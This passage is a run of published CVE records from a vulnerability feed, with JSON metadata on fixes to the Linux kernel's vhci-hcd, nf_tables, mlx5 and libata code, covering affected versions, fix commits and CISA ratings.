"datePublished": "2024-02-29T15:52:14.029Z",
"dateReserved": "2024-02-20T12:30:33.305Z",
"dateUpdated": "2025-05-04T07:38:01.601Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43883 (GCVE-0-2024-43883)
Vulnerability from cvelistv5
Published
2024-08-23 13:08
Modified
2025-05-04 09:28
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
usb: vhci-hcd: Do not drop references before new references are gained
At a few places the driver carries stale pointers
to references that can still be used. Make sure that does not happen.
This strictly speaking closes ZDI-CAN-22273, though there may be
similar races in the driver.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43883",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:32:14.861945Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:09.242Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/usb/usbip/vhci_hcd.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "5a3c473b28ae1c1f7c4dc129e30cb19ae6e96f89",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "9c3746ce8d8fcb3a2405644fc0eec7fc5312de80",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "4dacdb9720aaab10b6be121eae55820174d97174",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "e8c1e606dab8c56cf074b43b98d0805de7322ba2",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "585e6bc7d0a9bf73a8be3d3fb34e86b90cc61a14",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "128e82e41cf7d74a562726c1587d9d2ede1a0a37",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "c3d0857b7fc2c49f68f89128a5440176089a8f54",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "afdcfd3d6fcdeca2735ca8d994c5f2d24a368f0a",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/usb/usbip/vhci_hcd.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.320",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.282",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.224",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.105",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.46",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.320",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.282",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.224",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.105",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.46",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: vhci-hcd: Do not drop references before new references are gained\n\nAt a few places the driver carries stale pointers\nto references that can still be used. Make sure that does not happen.\nThis strictly speaking closes ZDI-CAN-22273, though there may be\nsimilar races in the driver."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:28:30.800Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/5a3c473b28ae1c1f7c4dc129e30cb19ae6e96f89"
},
{
"url": "https://git.kernel.org/stable/c/9c3746ce8d8fcb3a2405644fc0eec7fc5312de80"
},
{
"url": "https://git.kernel.org/stable/c/4dacdb9720aaab10b6be121eae55820174d97174"
},
{
"url": "https://git.kernel.org/stable/c/e8c1e606dab8c56cf074b43b98d0805de7322ba2"
},
{
"url": "https://git.kernel.org/stable/c/585e6bc7d0a9bf73a8be3d3fb34e86b90cc61a14"
},
{
"url": "https://git.kernel.org/stable/c/128e82e41cf7d74a562726c1587d9d2ede1a0a37"
},
{
"url": "https://git.kernel.org/stable/c/c3d0857b7fc2c49f68f89128a5440176089a8f54"
},
{
"url": "https://git.kernel.org/stable/c/afdcfd3d6fcdeca2735ca8d994c5f2d24a368f0a"
}
],
"title": "usb: vhci-hcd: Do not drop references before new references are gained",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-43883",
"datePublished": "2024-08-23T13:08:10.508Z",
"dateReserved": "2024-08-17T09:11:59.287Z",
"dateUpdated": "2025-05-04T09:28:30.800Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26835 (GCVE-0-2024-26835)
Vulnerability from cvelistv5
Published
2024-04-17 10:10
Modified
2025-05-04 08:57
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
netfilter: nf_tables: set dormant flag on hook register failure
We need to set the dormant flag again if we fail to register
the hooks.
During memory pressure hook registration can fail and we end up
with a table marked as active but no registered hooks.
On table/base chain deletion, nf_tables will attempt to unregister
the hook again which yields a warn splat from the nftables core.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: bf8083bbf8fa202e6e5316bbd99759ab82bfe7a3 Version: e10f661adc556c4969c70ddaddf238bffdaf1e87 Version: d9c4da8cb74e8ee6e58a064a3573aa37acf6c935 Version: 179d9ba5559a756f4322583388b3213fe4e391b0 Version: 179d9ba5559a756f4322583388b3213fe4e391b0 Version: 179d9ba5559a756f4322583388b3213fe4e391b0 Version: 179d9ba5559a756f4322583388b3213fe4e391b0 Version: 179d9ba5559a756f4322583388b3213fe4e391b0 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.604Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a6411f3c48f991c19aaf9a24fce36865fbba28d7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ae4360cbd385f0d7a8a86d5723e50448cc6318f3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/31ea574aeca1aa488e18716459bde057217637af"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/664264a5c55bf97a9c571c557d477b75416199be"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0c9302a6da262e6ab6a6c1d30f04a6130ed97376"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f2135bbf14949687e96cabb13d8a91ae3deb9069"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6f2496366426cec18ba53f1c7f6c3ac307ca6a95"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bccebf64701735533c8db37773eeacc6566cc8ec"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26835",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:48:51.357992Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:28.802Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/netfilter/nf_tables_api.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "a6411f3c48f991c19aaf9a24fce36865fbba28d7",
"status": "affected",
"version": "bf8083bbf8fa202e6e5316bbd99759ab82bfe7a3",
"versionType": "git"
},
{
"lessThan": "ae4360cbd385f0d7a8a86d5723e50448cc6318f3",
"status": "affected",
"version": "e10f661adc556c4969c70ddaddf238bffdaf1e87",
"versionType": "git"
},
{
"lessThan": "31ea574aeca1aa488e18716459bde057217637af",
"status": "affected",
"version": "d9c4da8cb74e8ee6e58a064a3573aa37acf6c935",
"versionType": "git"
},
{
"lessThan": "664264a5c55bf97a9c571c557d477b75416199be",
"status": "affected",
"version": "179d9ba5559a756f4322583388b3213fe4e391b0",
"versionType": "git"
},
{
"lessThan": "0c9302a6da262e6ab6a6c1d30f04a6130ed97376",
"status": "affected",
"version": "179d9ba5559a756f4322583388b3213fe4e391b0",
"versionType": "git"
},
{
"lessThan": "f2135bbf14949687e96cabb13d8a91ae3deb9069",
"status": "affected",
"version": "179d9ba5559a756f4322583388b3213fe4e391b0",
"versionType": "git"
},
{
"lessThan": "6f2496366426cec18ba53f1c7f6c3ac307ca6a95",
"status": "affected",
"version": "179d9ba5559a756f4322583388b3213fe4e391b0",
"versionType": "git"
},
{
"lessThan": "bccebf64701735533c8db37773eeacc6566cc8ec",
"status": "affected",
"version": "179d9ba5559a756f4322583388b3213fe4e391b0",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/netfilter/nf_tables_api.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.13"
},
{
"lessThan": "5.13",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.270",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.211",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.150",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.80",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.19",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.270",
"versionStartIncluding": "5.4.262",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.211",
"versionStartIncluding": "5.10.202",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.150",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.80",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.19",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.7",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.13",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_tables: set dormant flag on hook register failure\n\nWe need to set the dormant flag again if we fail to register\nthe hooks.\n\nDuring memory pressure hook registration can fail and we end up\nwith a table marked as active but no registered hooks.\n\nOn table/base chain deletion, nf_tables will attempt to unregister\nthe hook again which yields a warn splat from the nftables core."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:57:35.908Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/a6411f3c48f991c19aaf9a24fce36865fbba28d7"
},
{
"url": "https://git.kernel.org/stable/c/ae4360cbd385f0d7a8a86d5723e50448cc6318f3"
},
{
"url": "https://git.kernel.org/stable/c/31ea574aeca1aa488e18716459bde057217637af"
},
{
"url": "https://git.kernel.org/stable/c/664264a5c55bf97a9c571c557d477b75416199be"
},
{
"url": "https://git.kernel.org/stable/c/0c9302a6da262e6ab6a6c1d30f04a6130ed97376"
},
{
"url": "https://git.kernel.org/stable/c/f2135bbf14949687e96cabb13d8a91ae3deb9069"
},
{
"url": "https://git.kernel.org/stable/c/6f2496366426cec18ba53f1c7f6c3ac307ca6a95"
},
{
"url": "https://git.kernel.org/stable/c/bccebf64701735533c8db37773eeacc6566cc8ec"
}
],
"title": "netfilter: nf_tables: set dormant flag on hook register failure",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26835",
"datePublished": "2024-04-17T10:10:02.907Z",
"dateReserved": "2024-02-19T14:20:24.181Z",
"dateUpdated": "2025-05-04T08:57:35.908Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42142 (GCVE-0-2024-42142)
Vulnerability from cvelistv5
Published
2024-07-30 07:46
Modified
2025-05-04 09:24
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net/mlx5: E-switch, Create ingress ACL when needed
Currently, ingress acl is used for three features. It is created only
when vport metadata match and prio tag are enabled. But active-backup
lag mode also uses it. It is independent of vport metadata match and
prio tag. And vport metadata match can be disabled using the
following devlink command:
# devlink dev param set pci/0000:08:00.0 name esw_port_metadata \
value false cmode runtime
If ingress acl is not created, will hit panic when creating drop rule
for active-backup lag mode. If always create it, there will be about
5% performance degradation.
Fix it by creating ingress acl when needed. If esw_port_metadata is
true, ingress acl exists, then create drop rule using existing
ingress acl. If esw_port_metadata is false, create ingress acl and
then create drop rule.
References
| URL | Tags | |
|---|---|---|
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:54:32.562Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bc3ff8d3c05044de57865ebbb78cca8f7da3e595"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3e3551f8702978cd2221d2614ca6d6727e785324"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/83bc1a129f7fd0d7d05036ceb7ee69102624e320"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b20c2fb45470d0c7a603613c9cfa5d45720e17f2"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42142",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:15:50.447438Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:35.365Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlx5/core/esw/acl/ingress_ofld.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "bc3ff8d3c05044de57865ebbb78cca8f7da3e595",
"status": "affected",
"version": "1749c4c51c16e3e078faae0a876d01bafb187a74",
"versionType": "git"
},
{
"lessThan": "3e3551f8702978cd2221d2614ca6d6727e785324",
"status": "affected",
"version": "1749c4c51c16e3e078faae0a876d01bafb187a74",
"versionType": "git"
},
{
"lessThan": "83bc1a129f7fd0d7d05036ceb7ee69102624e320",
"status": "affected",
"version": "1749c4c51c16e3e078faae0a876d01bafb187a74",
"versionType": "git"
},
{
"lessThan": "b20c2fb45470d0c7a603613c9cfa5d45720e17f2",
"status": "affected",
"version": "1749c4c51c16e3e078faae0a876d01bafb187a74",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlx5/core/esw/acl/ingress_ofld.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.18"
},
{
"lessThan": "5.18",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.98",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.39",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.98",
"versionStartIncluding": "5.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.39",
"versionStartIncluding": "5.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.9",
"versionStartIncluding": "5.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "5.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5: E-switch, Create ingress ACL when needed\n\nCurrently, ingress acl is used for three features. It is created only\nwhen vport metadata match and prio tag are enabled. But active-backup\nlag mode also uses it. It is independent of vport metadata match and\nprio tag. And vport metadata match can be disabled using the\nfollowing devlink command:\n\n # devlink dev param set pci/0000:08:00.0 name esw_port_metadata \\\n\tvalue false cmode runtime\n\nIf ingress acl is not created, will hit panic when creating drop rule\nfor active-backup lag mode. If always create it, there will be about\n5% performance degradation.\n\nFix it by creating ingress acl when needed. If esw_port_metadata is\ntrue, ingress acl exists, then create drop rule using existing\ningress acl. If esw_port_metadata is false, create ingress acl and\nthen create drop rule."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:24:01.702Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/bc3ff8d3c05044de57865ebbb78cca8f7da3e595"
},
{
"url": "https://git.kernel.org/stable/c/3e3551f8702978cd2221d2614ca6d6727e785324"
},
{
"url": "https://git.kernel.org/stable/c/83bc1a129f7fd0d7d05036ceb7ee69102624e320"
},
{
"url": "https://git.kernel.org/stable/c/b20c2fb45470d0c7a603613c9cfa5d45720e17f2"
}
],
"title": "net/mlx5: E-switch, Create ingress ACL when needed",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42142",
"datePublished": "2024-07-30T07:46:35.929Z",
"dateReserved": "2024-07-29T15:50:41.189Z",
"dateUpdated": "2025-05-04T09:24:01.702Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-41087 (GCVE-0-2024-41087)
Vulnerability from cvelistv5
Published
2024-07-29 15:48
Modified
2025-05-04 09:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ata: libata-core: Fix double free on error
If e.g. the ata_port_alloc() call in ata_host_alloc() fails, we will jump
to the err_out label, which will call devres_release_group().
devres_release_group() will trigger a call to ata_host_release().
ata_host_release() calls kfree(host), so executing the kfree(host) in
ata_host_alloc() will lead to a double free:
kernel BUG at mm/slub.c:553!
Oops: invalid opcode: 0000 [#1] PREEMPT SMP NOPTI
CPU: 11 PID: 599 Comm: (udev-worker) Not tainted 6.10.0-rc5 #47
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-2.fc40 04/01/2014
RIP: 0010:kfree+0x2cf/0x2f0
Code: 5d 41 5e 41 5f 5d e9 80 d6 ff ff 4d 89 f1 41 b8 01 00 00 00 48 89 d9 48 89 da
RSP: 0018:ffffc90000f377f0 EFLAGS: 00010246
RAX: ffff888112b1f2c0 RBX: ffff888112b1f2c0 RCX: ffff888112b1f320
RDX: 000000000000400b RSI: ffffffffc02c9de5 RDI: ffff888112b1f2c0
RBP: ffffc90000f37830 R08: 0000000000000000 R09: 0000000000000000
R10: ffffc90000f37610 R11: 617461203a736b6e R12: ffffea00044ac780
R13: ffff888100046400 R14: ffffffffc02c9de5 R15: 0000000000000006
FS: 00007f2f1cabe980(0000) GS:ffff88813b380000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00007f2f1c3acf75 CR3: 0000000111724000 CR4: 0000000000750ef0
PKRU: 55555554
Call Trace:
<TASK>
? __die_body.cold+0x19/0x27
? die+0x2e/0x50
? do_trap+0xca/0x110
? do_error_trap+0x6a/0x90
? kfree+0x2cf/0x2f0
? exc_invalid_op+0x50/0x70
? kfree+0x2cf/0x2f0
? asm_exc_invalid_op+0x1a/0x20
? ata_host_alloc+0xf5/0x120 [libata]
? ata_host_alloc+0xf5/0x120 [libata]
? kfree+0x2cf/0x2f0
ata_host_alloc+0xf5/0x120 [libata]
ata_host_alloc_pinfo+0x14/0xa0 [libata]
ahci_init_one+0x6c9/0xd20 [ahci]
Ensure that we will not call kfree(host) twice, by performing the kfree()
only if the devres_open_group() call failed.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: dafd6c496381c1cd1f5ba9ad953e810bdcc931bc Version: dafd6c496381c1cd1f5ba9ad953e810bdcc931bc Version: dafd6c496381c1cd1f5ba9ad953e810bdcc931bc Version: dafd6c496381c1cd1f5ba9ad953e810bdcc931bc Version: dafd6c496381c1cd1f5ba9ad953e810bdcc931bc Version: dafd6c496381c1cd1f5ba9ad953e810bdcc931bc Version: dafd6c496381c1cd1f5ba9ad953e810bdcc931bc Version: dafd6c496381c1cd1f5ba9ad953e810bdcc931bc |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:46:52.364Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/290073b2b557e4dc21ee74a1e403d9ae79e393a2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/56f1c7e290cd6c69c948fcd2e2a49e6a637ec38f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/010de9acbea58fbcbda08e3793d6262086a493fe"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5dde5f8b790274723640d29a07c5a97d57d62047"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/702c1edbafb2e6f9d20f6d391273b5be09d366a5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/062e256516d7db5e7dcdef117f52025cd5c456e3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8106da4d88bbaed809e023cc8014b766223d6e76"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ab9e0c529eb7cafebdd31fe1644524e80a48b05d"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-41087",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:20:45.691103Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:58.682Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/ata/libata-core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "290073b2b557e4dc21ee74a1e403d9ae79e393a2",
"status": "affected",
"version": "dafd6c496381c1cd1f5ba9ad953e810bdcc931bc",
"versionType": "git"
},
{
"lessThan": "56f1c7e290cd6c69c948fcd2e2a49e6a637ec38f",
"status": "affected",
"version": "dafd6c496381c1cd1f5ba9ad953e810bdcc931bc",
"versionType": "git"
},
{
"lessThan": "010de9acbea58fbcbda08e3793d6262086a493fe",
"status": "affected",
"version": "dafd6c496381c1cd1f5ba9ad953e810bdcc931bc",
"versionType": "git"
},
{
"lessThan": "5dde5f8b790274723640d29a07c5a97d57d62047",
"status": "affected",
